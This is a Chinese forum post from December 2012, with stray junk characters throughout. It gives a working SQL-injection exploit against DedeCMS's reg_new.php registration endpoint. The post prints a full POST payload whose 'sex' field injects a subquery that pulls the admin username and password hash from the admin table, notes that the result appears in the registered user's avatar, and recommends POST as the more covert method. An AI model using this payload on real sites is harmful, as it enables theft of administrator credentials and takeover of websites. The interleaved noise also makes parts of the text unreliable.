dedecms版本 201211228 @2 ^1 U" a3 I: A8 _
, c* m8 g; _( V: [需要magic_quotes_gpc=Off9 y. N; M8 X0 ~+ i4 g7 y' ]
: \! {1 |7 k9 G+ U8 e应该是没有什么大危害的漏洞.
! d7 |- F+ b5 R; G& w, z+ m原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
$ K6 t, \! E& r! C9 \. ?: ^
1 y7 o# w: `7 x( q" F是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
. f# A" i. ^8 i$ a5 k% w+ IPOST提交以下数据,其实不用POST提交的,这样隐蔽点.1 d% b0 P9 w$ I) R3 a8 o$ K( z' t' n/ h
$ x) [) u- c: E) Q p: E
http:///de/member/reg_new.php
9 n9 v7 |1 u+ D4 o! f* c+ S9 ~5 `" Q
POST* p# U3 X% d P4 D2 {
2 ]5 D% \+ j# j
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=6 e/ n" H# f5 K' \6 U. a
& X9 v4 Q" Q3 L; X成功注册后,头像处里面有好玩的信息.
0 t$ O; m, g; a, N
% ?0 S. o6 S4 o* k9 n5 d |
发表于 2012-12-5 10:03:32
收藏
支持
反对